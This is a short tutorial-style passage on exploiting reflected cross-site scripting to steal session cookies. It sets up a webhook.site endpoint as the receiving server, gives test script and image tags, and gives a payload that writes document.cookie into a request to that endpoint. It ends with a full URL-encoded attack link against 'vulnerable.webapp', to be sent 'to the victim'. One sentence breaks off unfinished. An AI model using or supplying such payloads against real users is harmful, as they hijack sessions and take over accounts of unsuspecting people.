We can leverage the following website so that we do not need our own webserver. https://webhook.site/
With a webhook in hand, we’re ready to craft our payload. Our payload should look like this. We’ll want to make sure we replace the URL with our generated webhook address.
A simple test can first be created with this:
<img src="[URL]/test.jpg" /> <script src="http://[URL]/test.js"></script>
<script> document.write('<img src="[URL]?c='+document.cookie+'" />'); </script>
Before sending the link to the victim, make sure you encode the + symbols by replacing them with
An example payload will look like the following:
http://vulnerable.webapp/index.php?name=<script>document.write('<img src="https://webhook.site/xxx-xxx-xxx/?c='%2bdocument.cookie%2b'" />');</script>